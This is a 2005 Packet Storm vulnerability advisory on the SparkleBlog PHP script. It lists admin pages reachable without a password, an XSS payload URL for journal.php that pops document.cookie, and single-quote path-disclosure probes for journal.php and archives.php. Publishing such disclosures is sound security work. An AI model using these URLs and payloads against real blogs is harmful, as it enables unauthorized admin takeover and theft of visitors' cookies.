sparkleBlog.txt

2005-01-18T00:00:00
ID PACKETSTORM:35776
Type packetstorm
Reporter Kovacs Laszlo
Modified 2005-01-18T00:00:00

Description

                                        
                                            `Various Vulnerabilities in SparkleBlog  
  
SparkleBlog is an open-source PHP script which allows you to input and edit  
your weblog entries, without having to go through the hassle of coding in  
HTML and uploading via FTP every time you want to make an update. A weblog  
(aka blog) is simply an online version of a diary, and blogging has become  
very popular in recent years. The time and date is automatically added to  
the end of each of your blog entries, so people know exactly when you posted  
them. The script even allows your website's visitors to make comments on  
each of your blog entries, if they wish.  
  
No password requied for admin pages. So a remote attacker can request the  
file and admin the blog site.   
  
[blogsite]/admin/blogadmin.php  
[blogsite]/admin/cpconfig.php  
[blogsite]/admin/editentries.php  
[blogsite]/admin/update.php  
  
XSS attack in journal.php:  
  
[blogsite]/journal.php?id=document.write(unescape(%22%3CSCRIPT%3Ealert(docum  
ent.domain);%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E%22  
));  
  
Path disclosure in journal.php:   
  
[blogsite]/blog/journal.php?id='  
  
Path disclosure in archives.php:   
  
[blogsite]/blog/archives.php?id='  
  
No respone from vendor since: 2005.01.01.  
  
SparkleBlog's web page: http://www.creamed-coconut.org/sparkleblog.php   
  
Regards,   
  
Kovács László  
kovacs.laszlo@metalogique.hu   
  
  
`